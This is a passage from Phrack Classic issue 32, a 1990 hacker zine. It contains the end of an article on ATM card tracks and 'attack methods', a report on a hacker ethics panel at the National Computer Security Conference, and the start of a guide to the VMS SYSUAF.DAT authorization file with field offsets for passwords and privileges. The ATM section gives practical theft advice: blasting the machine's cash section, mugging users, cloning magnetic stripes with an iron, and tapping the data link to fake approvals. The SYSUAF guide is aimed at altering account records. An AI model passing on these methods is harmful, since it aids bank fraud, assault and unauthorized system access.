the transaction between the ATM and the Main Computer).
|
|
"^" = Data-field seperator
|
|
"(dscrmn. data)" = Discriminate Data. Not much is known exactly what is
|
|
stored here. Perhaps Bank Identification data or
|
|
bank account type (savings, checking?) ?
|
|
";" = End of data character.
|
|
"LRC" = Longitude Redundancy Check.
|
|
|
|
Track 3: ";" = Beginning of data character.
|
|
"12345675" = Account number of the cardholder.
|
|
"^" = Data-field seperator.
|
|
"01/91" = Month/Year the card expires.
|
|
"^" = Data-field seperator.
|
|
"5" = The crypting-digit. When the transaction request
|
|
is sent to the main computer, it is encrypted.
|
|
This digit tells which encryption-key is used.
|
|
"(dscrmn. data)" = A duplicate of the discriminate data stored on
|
|
Track 2.
|
|
";" = End of data character.
|
|
"LRC" = Longitude Redundancy Check.
|
|
|
|
When the card is being processed the ATM tries to match the
|
|
account number, expiration date and name stored on each track.
|
|
The reason they duplicate data is for verification purposes. But,
|
|
notice that the duplicate data is stored on different tracks, each
|
|
having different recording densities. Once the information on the
|
|
tracks are confirmed to match, the ATM compares them to the embossed
|
|
information on the front-side. If all of the information matches
|
|
then the transaction will proceed. If it doesn't match, then the card
|
|
is considered to be damaged and the ATM will keep the card. It will
|
|
give the cardholder a piece of paper instructing the user to notify
|
|
the bank who issued his ATM-card so he can receive a replacement
|
|
card in the mail (this process takes about 3 weeks).
|
|
|
|
|
|
Now that you know how the ATM-system is designed and what information
|
|
is kept where on the card, what "security defects" does this system
|
|
contain ? I will outline 4 methods of attacking this system that
|
|
have been tried (not by me!).
|
|
|
|
1) Vandalization: If you want, you can break-in to the ATM.
|
|
However, most ATM's contain 'sensor' devices which sound an
|
|
alarm when this is tried. Therefore, if you're going to try
|
|
this method I do not suggest using a hammer and chisel on the
|
|
ATM because it will take 1/2 an hour to get the machine open
|
|
and by that time the police will be there. You could try a
|
|
much faster way, dynamite; but that might scatter the money
|
|
all-over, making it hard to collect. Also, the bottom-half
|
|
is where most of the money is stored (unless you happen to
|
|
choose a machine that has issued all of its withdrawl-cash)
|
|
so you'll want to break into the bottom-half of the ATM.
|
|
|
|
In relation to this, you could wait outside the ATM for a
|
|
valid-user to complete his withdrawl-transaction and mug him.
|
|
As far as I know, the bank holds no responsibilty for placing
|
|
the ATM in a 'secure' enviroment. However, usually they will
|
|
have lights nearby and placed in 'reasonable' places where
|
|
people need money (example: Grocery store) and where the chance
|
|
of mugging is slim.
|
|
|
|
|
|
2) Physical Penetration: There are several ways of doing this.
|
|
If you have a stolen card, you could randomly try guessing his
|
|
account-password. But, I feel this is a primitive method.
|
|
If you try too many attempts at guessing the 'password',
|
|
the ATM will return the card to you. But, your attempts
|
|
*might* be recorded in the central computer; allowing the
|
|
bank to decide whether to cancel that card... However,
|
|
this has not been verified by me. If you do get a cash-card,
|
|
you can make counterfeit-cards.
|
|
|
|
A) Counterfiet ATM-cards: The same method for producing
|
|
counterfiet credit cards applies to ATM-cards. If you
|
|
have a valid ATM-card you can 'clone' it simply by embossing
|
|
a blank-card with the same information. Copying the mag-
|
|
netic strip is also easy. To do this, you place a blank
|
|
strip of the magnetic tape on top of the valid magnetic
|
|
strip. Then, using an iron on low-heat, gently rub the
|
|
iron across the two strips for a few seconds. Lastly,
|
|
peel the new strip apart from the valid one and you've
|
|
got a copy of all the data from the valid ATM-card.
|
|
|
|
B) Also, I've heard a case where some guys had a machine
|
|
that could read and write to the magnetic strips (probably
|
|
they were employees of a company that produces the ATM-cards).
|
|
Using this machine, they were able to create and change
|
|
existing data on ATM-cards (such as the expiration date
|
|
so they could keep using the same card over a long period
|
|
of time).
|
|
|
|
In relation to this there are other devices available that
|
|
can read and write to magnetic strips. Using your own
|
|
microcomputer, you can buy a device that allows you to
|
|
read and write to these magnetic strips. It looks
|
|
similar to a disk drive. If you're interested in
|
|
exploring this method, I'll suggest that you contact
|
|
the following company:
|
|
|
|
American Magnetics Corporation
|
|
740 Watsoncenter Road
|
|
Carson, California 90745
|
|
USA
|
|
|
|
213/775-8651
|
|
213/834-0685 FAX
|
|
910-345-6258 TWX
|
|
|
|
C) WARNING: During each transaction attempted on an ATM a
|
|
photo of the person requesting the transaction is taken.
|
|
How long this film is stored is unknown, but it probably
|
|
is different for each bank (unless there is a federal
|
|
regulation regarding this). Also, it is possible that
|
|
this is not done at all ATMs.
|
|
|
|
3) "Insider" Theft: The above case also crosses over into this
|
|
section. The biggest 'security leaks' in any company are
|
|
its employees. This is also the easiest way to steal money
|
|
from ATMs. The man who collects the deposits from the machine
|
|
and inserts cash for withdrawls has the easiest and most
|
|
open access to these machines. I was told that this person
|
|
can easily steal money from ATMs and not be detected. Another
|
|
person with access to these machines is the technician. The
|
|
technician who fixes ATMs is the most-knowledgeable person
|
|
about ATMs within the bank, therefore he should be a trust-
|
|
worthy guy and receive a 'comfortable' salary.. otherwise
|
|
he'll begin to collect 'retirement benefits' from the ATM
|
|
and this may go undetected.
|
|
|
|
However, I have heard of some embezzlement-cases involving ATMs,
|
|
so I think it's not as easy as it seems. It's only common sense
|
|
that a bank would account for every dollar of every transaction.
|
|
Whether the accounting is done inside the ATM or the main
|
|
computer doesn't make a difference... some form of accounting
|
|
is *probably* done.
|
|
|
|
4) Data-link Intercept: This method has been very successful. What
|
|
you do is 'tap' into the wires that connect the ATM to the Main
|
|
computer. By doing this you can intercept and send signals to
|
|
the ATM. However, some 'inside information' is needed because
|
|
the transmission is encrypted (refer to the Cryptography Digit
|
|
stored on the magnetic strip). But, I think you don't need to
|
|
know *everything* being transferred. You should need to know
|
|
when to send the 'approval' signal to the ATM telling it to
|
|
dispense its' cash. I read a case (it may be in Phrack World
|
|
News; 1985?) where some guys netted $600,000 from various ATMs
|
|
using this method. This seems to be one of the better, and
|
|
more ingenious methods of stealing from these machines.
|
|
|
|
|
|
The information in this file should be 'adequate' to introduce you
|
|
to how ATMs work. How did I get this information? I went into a
|
|
bank and inquired about the computer-technology of ATMs. The man
|
|
who was responsible for the ATMs was a bureaucrat and actually knew
|
|
very little about the 'guts' of ATMs. Luckily the ATM-technician
|
|
was there that day and I agreed to buy him dinner later that evening.
|
|
(Please refer to: "Insider" Theft and the principle of Company-Loyalty).
|
|
During the dinner at "Toppers" (a neat 1950's Burgers/Milkshake/Beer
|
|
restaurant) he provided me with Operation and Repair manuals for the
|
|
ATMs. I feel this information is well-worth the $3.82 dinner and
|
|
will be of some value to its' readers. Some good information was
|
|
screened-out due to its 'delicate nature', but the information I've
|
|
provided has been confirmed.
|
|
|
|
|
|
+---------+
|
|
] CREDITS ]
|
|
+---------+
|
|
The Mentor (Phrack #8, File #7; "Fun with Automatic Tellers")
|
|
Deserted Surfer
|
|
Hyudori
|
|
Lex Luthor
|
|
|
|
Please distribute this file in its complete form.
|
|
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #7 of 12
|
|
|
|
|
|
13th Annual National Computer Security Conference
|
|
October 1-4, 1990
|
|
Omni Shoreham Hotel
|
|
Washington, D.C.
|
|
A "Knight Lightning" Perspective
|
|
by Craig M. Neidorf
|
|
|
|
Dr. Dorothy Denning first hinted at inviting me to take part on her panel
|
|
"Hackers: Who Are They?" in May 1990 when we first came into contact while
|
|
preparing for my trial. At the time I did not feel that it was a very good
|
|
idea since no one knew what would happen to me over the next few months. At
|
|
the conclusion of my trial I agreed to participate and surprisingly, my
|
|
attorney, Sheldon Zenner (of Katten, Muchin, & Zavis), accepted an invitation
|
|
to speak as well.
|
|
|
|
A few weeks later there was some dissension to the idea of having me appear at
|
|
the conference from some professionals in the field of computer security. They
|
|
felt that my presence at such a conference undermined what they stood for and
|
|
would be observed by computer "hackers" as a reward of sorts for my notoriety
|
|
in the hacker community. Fortunately Dr. Denning stuck to her personal values
|
|
and did not exclude me from speaking.
|
|
|
|
Unlike Gordon Meyer, I was unable to attend Dr. Denning's presentation
|
|
"Concerning Hackers Who Break Into Computer Systems" and the ethics sessions,
|
|
although I was informed upon my arrival of the intense interest from the
|
|
conference participants and the reactions to my now very well known article
|
|
announcing the "Phoenix Project."
|
|
|
|
Not wishing to miss any more class than absolutely necessary, I arrived in
|
|
Washington D.C. late in the day on Wednesday, October 4th. By some bizarre
|
|
coincidence I ended up on the same flight with Sheldon Zenner.
|
|
|
|
I had attended similar conventions before such as the Zeta Beta Tau National
|
|
Convention in Baltimore the previous year, but there was something different
|
|
about this one. I suppose considering what I have been through it was only
|
|
natural for me to be a little uneasy when surrounded by computer security
|
|
professionals, but oddly enough this feeling soon passed as I began to
|
|
encounter friends both old and new.
|
|
|
|
Zenner and I met up with Dorothy and Peter Denning and soon after I met Terry
|
|
Gross, an attorney hired by the Electronic Frontier Foundation who had helped
|
|
with my case in reference to the First Amendment issues. Emmanuel Goldstein,
|
|
editor of 2600 Magazine and probably the chief person responsible for spreading
|
|
the news and concern about my indictment last Spring, and Frank Drake, editor
|
|
of W.O.R.M. showed up. I had met Drake once before. Finally I ran into Gordon
|
|
Meyer.
|
|
|
|
So for a while we all exchanged stories about different events surrounding our
|
|
lives and how things had changed over the years only to be interrupted once by
|
|
a odd gentleman from Germany who inquired if we were members of the Chaos
|
|
Computer Club. At the banquet that evening, I was introduced to Peter Neumann
|
|
(who among many other things is the moderator of the Internet Digest known as
|
|
"RISKS") and Marc Rotenberg (Computer Professionals for Social Responsibility).
|
|
|
|
Because of the great interest in the ethics sessions and comments I had heard
|
|
from people who had attended, I felt a strange irony come into play. I've
|
|
hosted and attended numerous "hacker" conventions over the years, the most
|
|
notable being "SummerCon". At these conventions one of the main time consuming
|
|
activities has always been to play detective and attempt to solve the mystery
|
|
of which one of the guests or other people at the hotel were there to spy on us
|
|
(whether they were government agents or some other form of security personnel).
|
|
|
|
So where at SummerCon the youthful hackers were all racing around looking for
|
|
the "feds," at the NCSC I wondered if the security professionals were reacting
|
|
in an inverse capacity... Who Are The Hackers? Despite this attitude or maybe
|
|
because of it, I and the other panelists, wore our nametags proudly with a
|
|
feeling of excitement surrounding us.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
October 4, 1990
|
|
|
|
Dorothy Denning had gathered the speakers for an early morning brunch and I
|
|
finally got a chance to meet Katie Hafner in person. The panelists discussed
|
|
some possibilities of discussion questions to start off the presentation and
|
|
before I knew it, it was time to meet the public.
|
|
|
|
As we gathered in the front of the conference room, I was dismayed to find that
|
|
the people in charge of the setting up the nameboards (that would sit in front
|
|
of each panelist) had attended the Cook school of spelling and labeled me as
|
|
"Neirdorf." Zenner thought this was hysterical. Luckily they were able to
|
|
correct the error before we began.
|
|
|
|
Hackers: Who Are They?
|
|
|
|
Dr. Denning started the presentation by briefly introducing each panelist and
|
|
asking them a couple of questions.
|
|
|
|
Katie Hafner disputed the notion that her work has caused a glorification
|
|
of hacking because of the severe hardships the people she interviewed had to
|
|
endure. I found myself sympathizing with her as I knew what it was like to
|
|
be in their positions. Many people commented later that her defense of Mitnick
|
|
seemed a little insincere as he had indeed committed some serious acts. Not
|
|
knowing all of the details surrounding Mitnick's case and not relying on the
|
|
general newsmedia as a basis for opinion I withheld any sort of judgment.
|
|
|
|
Emmanuel Goldstein and Frank Drake appeared to take on the mantle of being the
|
|
spokespersons for the hackers, although I'm unsure if they would agree with
|
|
this characterization. Drake's main point of view dealt with the idea that
|
|
young hackers seek to be able to use resources that they are otherwise excluded
|
|
from. He claimed to once have been a system intruder, but now that he is in
|
|
college and has ample computing resources available to him, he no longer sees a
|
|
need to "hack."
|
|
|
|
Goldstein on the other hand sought to justify hacking as being beneficial to
|
|
society because the hackers are finding security holes and alerting security to
|
|
fix these problems before something catastrophic occurs.
|
|
|
|
Gordon Meyer tried to explain the hacker mind-set and how the average hackers
|
|
does not see using corporate resources as having a real financial burden to
|
|
today's companies. Some people misunderstood his remarks to be speaking from a
|
|
factual position and took offense, stating that the costs are great indeed.
|
|
He also explained the differences between Phrack and the Computer Underground
|
|
Digest. Most notable is that CuD does not print tutorials about computer
|
|
systems.
|
|
|
|
Sheldon Zenner focused on the freedom of the speech and press issues. He also
|
|
spoke about technical details of the U.S. v. Neidorf case and the court rulings
|
|
that resulted from it. One major point of interest was his quite reasonable
|
|
belief that the courts will soon be holding companies financially liable for
|
|
damages that may occur because of illegal intrusion into their systems. This
|
|
was not to suggest that a criminal defense strategy could be that a company did
|
|
not do enough to keep an intruder out, but instead that the company could be
|
|
held civilly liable by outside parties.
|
|
|
|
Zenner and Denning alike discussed the nature of Phrack's articles. They found
|
|
that the articles appearing in Phrack contained the same types of material
|
|
found publicly in other computer and security magazines, but with one
|
|
significant difference. The tone of the articles. An article named "How to
|
|
Hack Unix" in Phrack usually contained very similar information to an article
|
|
you might see in Communications of the ACM only to be named "Securing Unix
|
|
Systems." But the differences were more extreme than just the titles. Some
|
|
articles in Phrack seemed to suggest exploiting security holes while the
|
|
Communications of the ACM concentrated more on fixing the problem. The
|
|
information in both articles would be comparable, but the audiences reading and
|
|
writing these articles were often very different.
|
|
|
|
I explained the concept and operation of Phrack and wandered into a discussion
|
|
about lack of privacy concerning electronic mail on the Internet from
|
|
government officials, system managers, and possibly even by hackers. I went on
|
|
to remark that the security professionals were missing the point and the
|
|
problem. The college and high-school students while perhaps doing some
|
|
exploration and causing some slight disturbances are not the place to be
|
|
focusing their efforts. The real danger comes from career criminals and
|
|
company insiders who know the systems very well from being a part of it. These
|
|
people are the source of computer crime in this country and are the ones who
|
|
need to be dealt with. Catching a teenage hacker may be an easier task, but
|
|
ultimately will change nothing. To this point I agreed that a hacker gaining
|
|
entry and exposing holes on computer systems may be a service to some degree,
|
|
but unlike Goldstein, I could not maintain that such activity should bring
|
|
prosecutorial immunity to the hacker. This is a matter of discretion for
|
|
security personnel and prosecutors to take into consideration. I hope they do.
|
|
|
|
To a large degree I was rather silent on stage. Perhaps because I was cut off
|
|
more than once or maybe even a little stagefright, but largely because many of
|
|
the questions posed by the audience were wrong on their face for me to answer.
|
|
I was not going to stand and defend hacking for its own sake nor was I there to
|
|
explain the activities of every hacker in existence.
|
|
|
|
So I let Goldstein and Drake handle questions geared to be answered by a system
|
|
intruder and I primarily only spoke out concerning the First Amendment and
|
|
Phrack distribution. In one instance a man upset both by Drake's comments
|
|
about how the hackers just want to use resources they can't get elsewhere and
|
|
by Goldstein's presentation of the Operation Sun-Devil raids and the attack on
|
|
"Zod" in New York spoke up and accused us of being viciously one sided.
|
|
|
|
He said that none of us (and he singled me out specifically) look to be age 14
|
|
(he said he could believe I was 18) and that "our" statement that its ok for
|
|
hackers to gain access to systems simply because they lacked the resources
|
|
elsewhere meant it was ok for kids to steal money to buy drugs.
|
|
|
|
I responded by asking him if he was suggesting that if these "kids" were rich
|
|
and did not steal the money, it would be ok to purchase drugs? I was sure that
|
|
it was just a bad analogy so I changed the topic afterwards. He was right to a
|
|
certain extent, all of the hackers are not age 14 or even in highschool or
|
|
college, but is this really all that important of a distinction?
|
|
|
|
The activities of the Secret Service agents and other law enforcement officials
|
|
in Operation Sun-Devil and other investigations have been overwhelming and very
|
|
careless. True this is just their standard way of doing business and they may
|
|
not have even singled out the hackers as a group to focus excess zeal, but
|
|
recognizing that the hackers are in a worst case scenario "white-collar
|
|
offenders," shouldn't they alter their technique? Something that might be
|
|
important to make clear is that in truth my indictment and the indictments on
|
|
members of the Legion of Doom in Atlanta had absolutely nothing to do with
|
|
Operation Sun-Devil despite the general media creation.
|
|
|
|
Another interesting point that was brought out at the convention was that there
|
|
was so much activity and the Secret Service kept so busy in the state of
|
|
Arizona (possibly by some state official) concerning the hacker "problem" that
|
|
perhaps this is the reason the government did not catch on to the great Savings
|
|
& Loan multi-Billion dollar loss.
|
|
|
|
One gentleman spoke about his son being in a hospital where all his treatments
|
|
were being run by computer. He added that a system intruder might quite by
|
|
accident disrupt the system inadvertently endangering his son's life. Isn't
|
|
this bad? Obviously yes it is bad, but what was worse is that a critical
|
|
hospital computer system would be hooked up to a phoneline anyway. The main
|
|
reason for treatment in a hospital is so that the doctors are *there* to
|
|
monitor and assist patients. Could you imagine a doctor dialing in from home
|
|
with a modem to make his rounds?
|
|
|
|
There was some discussion about an editor's responsibility to inform
|
|
corporations if a hacker were to drop off material that he/she had breached
|
|
their security. I was not entirely in opposition to the idea, but the way I
|
|
would propose to do it was probably in the pages of a news article. This may
|
|
seem a little roundabout, but when you stop and consider all of the private
|
|
security consultants out there, they do not run around providing information to
|
|
corporations for free. They charge enormous fees for their services. There
|
|
are some organizations that do perform services for free (CERT comes to mind),
|
|
but that is the reason they were established and they receive funding from the
|
|
government which allows them to be more generous.
|
|
|
|
It is my belief that if a hacker were to give me some tips about security holes
|
|
and I in turn reported this information to a potential victim corporation, the
|
|
corporation would be more concerned with how and from whom I got the
|
|
information than with fixing the problem.
|
|
|
|
One of the government's expert witnesses from U.S. v. Neidorf attended this
|
|
session and he prodded Zenner and I with questions about the First Amendment
|
|
that were not made clear from the trial. Zenner did an excellent job of
|
|
clarifying the issues and presenting the truth where this Bellcore employee
|
|
sought to show us in a poor light.
|
|
|
|
During the commentary on the First Amendment, Hafner, Zenner, and I discussed a
|
|
July 22, 1988 article containing a Pacific Bell telephone document copied by a
|
|
hacker and sent to John Markoff that appeared on the front page of the New York
|
|
Times. A member of the audience said that this was ok, but the Phrack article
|
|
containing the E911 material was not because Phrack was only sent to hackers.
|
|
Zenner went on to explain that this was far from true since private security,
|
|
government employees, legal scholars, reporters, and telecom security personnel
|
|
all received Phrack without discrimination. There really is a lot that both
|
|
the hackers and security professionals have to learn about each other.
|
|
|
|
It began to get late and we were forced to end our session. I guess what
|
|
surprised me the most were all of the people that stayed behind to speak with
|
|
us. There were representatives from NASA, U.S. Sprint, Ford Aerospace, the
|
|
Department of Defense, a United States Army Lt. Colonel who all thanked us
|
|
for coming to speak. It was a truly unique experience in that a year ago I
|
|
would have presumed these people to be fighting against me and now it seems
|
|
that they are reasonable, decent people, with an interest in trying to learn
|
|
and help end the problems. I also met Mrs. Gail Meyer for the first time in
|
|
person as well.
|
|
|
|
I was swamped with people asking me how they could get Phrack and for the most
|
|
part I referred them to Gordon Meyer and CuD (and the CuD ftp). Just before we
|
|
went to lunch I met Donn Parker and Art Brodsky, an editor from Communications
|
|
Daily. So many interesting people to speak with and so little time. I spent a
|
|
couple hours at the National Gallery of Art with Emmanuel Goldstein, flew back
|
|
to St. Louis, and returned to school.
|
|
|
|
It was definitely an enLightening experience.
|
|
|
|
++++++++++++++++++++++++++++++
|
|
|
|
A very special thank you goes to Dorothy Denning, a dear friend who made it
|
|
possible for me to attend the conference.
|
|
|
|
:Craig M. Neidorf a/k/a Knight Lightning
|
|
|
|
C483307 @ UMCVMB.MISSOURI.EDU
|
|
C483307 @ UMCVMB.BITNET
|
|
_______________________________________________________________________________
|
|
|
|
==Phrack Classic==
|
|
|
|
Volume Three, Issue 32, File #8 of 12
|
|
|
|
|
|
+-------------------------------+
|
|
| Inside the SYSUAF.DAT file of |
|
|
+-------------------------------+
|
|
|
|
+------------------------------------------------------+
|
|
| Digital Equipment Corporation's VMS Operating System |
|
|
+------------------------------------------------------+
|
|
|
|
-= by =-
|
|
|
|
-----:> Pain Hertz <:----
|
|
|
|
|
|
|
|
Overview
|
|
~~~~~~~
|
|
In this file, I will explain what the System User Authorization File
|
|
is, what information it contains, what the logical and physical characteristics
|
|
of the file are, and how one can manipulate it to reveal and/or modify its
|
|
contents.
|
|
|
|
Background
|
|
~~~~~~~~
|
|
The Virtual Memory System (VMS) Operating System's System User
|
|
Authorization File (SYSUAF) contains the information that determines a given
|
|
user's username, password(s), security priviledges, as well as many other
|
|
similar data which either allow or disallow the user to have the system
|
|
perform certain tasks.
|
|
|
|
Characteristics
|
|
~~~~~~~~~~~~~~
|
|
The SYSUAF.DAT file (UAF) is usually located on the system on the
|
|
device pointed to by the logical SYS$COMMON, and under the [SYSEXE]
|
|
subdirectory. However, if the logical SYSUAF exists, it will point to the
|
|
location and name of the UAF.
|
|
|
|
The UAF is a binary, indexed data file. It's indexed on 4 keys:
|
|
username, UIC, extended user identifier, and owner identifier. Using
|
|
the VMS ANALYZE utility reveals the following about the UAF:
|
|
|
|
|
|
IDENT "01-JAN-1990 13:13:13 VAX/VMS ANALYZE/RMS_FILE Utility"
|
|
|
|
SYSTEM
|
|
SOURCE VAX/VMS
|
|
|
|
FILE
|
|
ALLOCATION 24
|
|
BEST_TRY_CONTIGUOUS yes
|
|
BUCKET_SIZE 3
|
|
CLUSTER_SIZE 3
|
|
CONTIGUOUS no
|
|
EXTENSION 3
|
|
FILE_MONITORING no
|
|
GLOBAL_BUFFER_COUNT 0
|
|
NAME "SYS$COMMON:[SYSEXE]SYSUAF.DAT;1"
|
|
ORGANIZATION indexed
|
|
OWNER [SYSTEM]
|
|
PROTECTION (system:RWED, owner:RWED, group:RWED, world:RE)
|
|
|
|
RECORD
|
|
BLOCK_SPAN yes
|
|
CARRIAGE_CONTROL none
|
|
FORMAT variable
|
|
SIZE 1412
|
|
|
|
AREA 0
|
|
ALLOCATION 9
|
|
BEST_TRY_CONTIGUOUS yes
|
|
BUCKET_SIZE 3
|
|
EXTENSION 3
|
|
|
|
AREA 1
|
|
ALLOCATION 3
|
|
BUCKET_SIZE 3
|
|
EXTENSION 3
|
|
|
|
AREA 2
|
|
ALLOCATION 12
|
|
BUCKET_SIZE 2
|
|
EXTENSION 12
|
|
|
|
KEY 0
|
|
CHANGES no
|
|
DATA_KEY_COMPRESSION yes
|
|
DATA_RECORD_COMPRESSION yes
|
|
DATA_AREA 0
|
|
DATA_FILL 100
|
|
DUPLICATES no
|
|
INDEX_AREA 1
|
|
INDEX_COMPRESSION yes
|
|
INDEX_FILL 100
|
|
LEVEL1_INDEX_AREA 1
|
|
NAME "Username"
|
|
NULL_KEY no
|
|
PROLOG 3
|
|
SEG0_LENGTH 32
|
|
SEG0_POSITION 4
|
|
TYPE string
|
|
|
|
KEY 1
|
|
CHANGES yes
|
|
DATA_KEY_COMPRESSION no
|
|
DATA_AREA 2
|
|
DATA_FILL 100
|
|
DUPLICATES yes
|
|
INDEX_AREA 2
|
|
INDEX_COMPRESSION no
|
|
INDEX_FILL 100
|
|
LEVEL1_INDEX_AREA 2
|
|
NAME "UIC"
|
|
NULL_KEY no
|
|
SEG0_LENGTH 4
|
|
SEG0_POSITION 36
|
|
TYPE bin4
|
|
|
|
KEY 2
|
|
CHANGES yes
|
|
DATA_KEY_COMPRESSION no
|
|
DATA_AREA 2
|
|
DATA_FILL 100
|
|
DUPLICATES yes
|
|
INDEX_AREA 2
|
|
INDEX_COMPRESSION no
|
|
INDEX_FILL 100
|
|
LEVEL1_INDEX_AREA 2
|
|
NAME "Extended User Identifier"
|
|
NULL_KEY no
|
|
SEG0_LENGTH 8
|
|
SEG0_POSITION 36
|
|
TYPE bin8
|
|
|
|
KEY 3
|
|
CHANGES yes
|
|
DATA_KEY_COMPRESSION no
|
|
DATA_AREA 2
|
|
DATA_FILL 100
|
|
DUPLICATES yes
|
|
INDEX_AREA 2
|
|
INDEX_COMPRESSION no
|
|
INDEX_FILL 100
|
|
LEVEL1_INDEX_AREA 2
|
|
NAME "Owner Identifier"
|
|
NULL_KEY yes
|
|
NULL_VALUE 0
|
|
SEG0_LENGTH 8
|
|
SEG0_POSITION 44
|
|
TYPE bin8
|
|
|
|
ANALYSIS_OF_AREA 0
|
|
RECLAIMED_SPACE 0
|
|
|
|
ANALYSIS_OF_AREA 1
|
|
RECLAIMED_SPACE 0
|
|
|
|
ANALYSIS_OF_AREA 2
|
|
RECLAIMED_SPACE 0
|
|
|
|
ANALYSIS_OF_KEY 0
|
|
DATA_FILL 71
|
|
DATA_KEY_COMPRESSION 75
|
|
DATA_RECORD_COMPRESSION 67
|
|
DATA_RECORD_COUNT 5
|
|
DATA_SPACE_OCCUPIED 3
|
|
DEPTH 1
|
|
INDEX_COMPRESSION 85
|
|
INDEX_FILL 1
|
|
INDEX_SPACE_OCCUPIED 3
|
|
LEVEL1_RECORD_COUNT 1
|
|
MEAN_DATA_LENGTH 644
|
|
MEAN_INDEX_LENGTH 34
|
|
|
|
ANALYSIS_OF_KEY 1
|
|
DATA_FILL 7
|
|
DATA_KEY_COMPRESSION 0
|
|
DATA_RECORD_COUNT 4
|
|
DATA_SPACE_OCCUPIED 2
|
|
DEPTH 1
|
|
DUPLICATES_PER_SIDR 0
|
|
INDEX_COMPRESSION 0
|
|
INDEX_FILL 2
|
|
INDEX_SPACE_OCCUPIED 2
|
|
LEVEL1_RECORD_COUNT 1
|
|
MEAN_DATA_LENGTH 15
|
|
MEAN_INDEX_LENGTH 6
|
|
|
|
ANALYSIS_OF_KEY 2
|
|
DATA_FILL 8
|
|
DATA_KEY_COMPRESSION 0
|
|
DATA_RECORD_COUNT 4
|
|
DATA_SPACE_OCCUPIED 2
|
|
DEPTH 1
|
|
DUPLICATES_PER_SIDR 0
|
|
INDEX_COMPRESSION 0
|
|
INDEX_FILL 2
|
|
INDEX_SPACE_OCCUPIED 2
|
|
LEVEL1_RECORD_COUNT 1
|
|
MEAN_DATA_LENGTH 19
|
|
MEAN_INDEX_LENGTH 10
|
|
|
|
ANALYSIS_OF_KEY 3
|
|
! This index is uninitialized - there are no records.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Examination
|
|
~~~~~~~~~
|
|
|
|
Generally, an interactive user would use the AUTHORIZE utility to
|
|
modify or examine the UAF, while a program would use the $GETUAI system
|
|
services (get user authorization information service) to examine the file.
|
|
The $GETUAI system services reference provide an excellent description of what
|
|
fields the UAF contains, and how many bytes are used within the file to store
|
|
each of those fields. However, it may not be within your realm of skills to
|
|
program using system services. It would probably be considerably easier to
|
|
use a sector editor/browser to locate values within the UAF. You could use a
|
|
sector editor/browser online (such as VFE.EXE), or you you might choose to
|
|
download the UAF and use an editor/browse for your personal computer.
|
|
Regardless of which method you choose, you will have to know the offset of
|
|
each field within the user authorization file. This is what I have provided
|
|
for you.
|
|
|
|
The contents of the UAF under VMS release 5.3-1 are as follows:
|
|
|
|
Offset Description Length
|
|
-----------------------------------------------------------------------------
|
|
0 Record Header 4
|
|
4 Username (loginid) 32
|
|
36 Member UIC - Mem UIC decimal 1 = 0100 2
|
|
Mem UIC decimal 10 = 0A00
|
|
Mem UIC decimal 256 = FF01
|
|
|
|
38 Group UIC - Same as format as member UIC 2
|
|
|
|
Note: UICs as displayed in the VMS environment
|
|
are OCTAL. A UIC of [010,001] would be saved as
|
|
'01000800' in bytes 36-39 (offset).
|
|
|
|
40 Nulls 12
|
|
52 Account name 32
|
|
84 1 byte - value = length of owner 1
|
|
85 Owner 31
|
|
116 1 byte - value = length of device 1
|
|
117 Device (default disk device) 31
|
|
148 1 byte - length of default (SYS$LOGIN) directory 1
|
|
149 Default (SYS$LOGIN) directory name 63
|
|
212 1 byte - length of default login command file 1
|
|
213 Default login command file 63
|
|
276 1 byte - length of default CLI 1
|
|
277 Default command language interpeter 31
|
|
|
|
Note: CLI is assumed to be in SYS$SYSTEM directory
|
|
and have an .EXE extension.
|
|
|
|
308 1 byte - length of user defined CLI tables 1
|
|
309 User defined CLI table name 31
|
|
340 Encrypted primary password 8
|
|
348 Encrypted secondary password 8
|
|
356 Number of login fails 2
|
|
358 Password encryption salt 2
|
|
360 Encryption algorithm code byte - primary password 1
|
|
361 Encryption algorithm code byte - secondary password 1
|
|
362 Password minimum length 1
|
|
363 Filler (1 byte) 1
|
|
364 Account expiration date 8
|
|
372 Password lifetime 8
|
|
380 Password change date/time - primary password 8
|
|
388 Password change date/time - secondary password 8
|
|
396 Last interactive login date/time 8
|
|
404 Last non-interactive login date/time 8
|
|
412 Authorize priviledges 8
|
|
420 Default priviledges 8
|
|
428 Filler (40 bytes) 40
|
|
|
|
468 Login Flags bits as follows: 4
|
|
|
|
7 6 5 4 3 2 1 0
|
|
-------------------------
|
|
| | | | | | | | |
|
|
-------------------------
|
|
|
|
Byte Offset 468:
|
|
|
|
Bit 0 - User can not use CTRL-Y
|
|
Bit 1 - User is restricted to default
|
|
command interpeter
|
|
Bit 2 - SET PASSWORD command is disabled
|
|
Bit 3 - Prevent user from changing any
|
|
defaults at login
|
|
Bit 4 - User account is disabled
|
|
Bit 5 - User will not receive the login
|
|
welcome message
|
|
Bit 6 - Announcement of new mail is suppressed
|
|
Bit 7 - Mail delivery to user is disabled
|
|
|
|
Byte Offset 469:
|
|
|
|
Bit 0 - User is required to use generated
|
|
passwords
|
|
Bit 1 - Primary password is expired
|
|
Bit 2 - Secondary password is expired
|
|
Bit 3 - All actions are audited
|
|
Bit 4 - User will not receive last login
|
|
messages
|
|
Bit 5 - User can not reconnect to existing
|
|
processes
|
|
Bit 6 - User can only login to terminals
|
|
defined by the automatic login
|
|
facility (ALF)
|
|
Bit 7 - User is required to change expired
|
|
passwords
|
|
|
|
Byte Offset 470:
|
|
|
|
Bit 0 - User is restricted to captive account
|
|
Bit 1 - Prevent user from executing RUN, MCR
|
|
commands, or foreign commands at the
|
|
DCL level
|
|
Bits 2-7 - Reserved for future use
|
|
|
|
Byte Offset 471:
|
|
|
|
Bits 0-7 - Reserved for future use
|
|
|
|
|
|
Note On Access Bytes:
|
|
|
|
Each bit set represents a 1-hour period, from bit 0 as
|
|
midnight to 1 a.m. to bit 23 as 11 p.m. to midnight.
|
|
|
|
472 Network access bytes - primary days 3
|
|
475 Network access bytes - seconday days 3
|
|
478 Batch access bytes - primary days 3
|
|
481 Batch access bytes - seconday days 3
|
|
484 Local access bytes - primary days 3
|
|
487 Local access bytes - seconday days 3
|
|
490 Dialup access bytes - primary days 3
|
|
493 Dialup access bytes - secondary days 3
|
|
496 Remote access bytes - primary days 3
|
|
499 Remote access bytes - seconday days 3
|
|
|
|
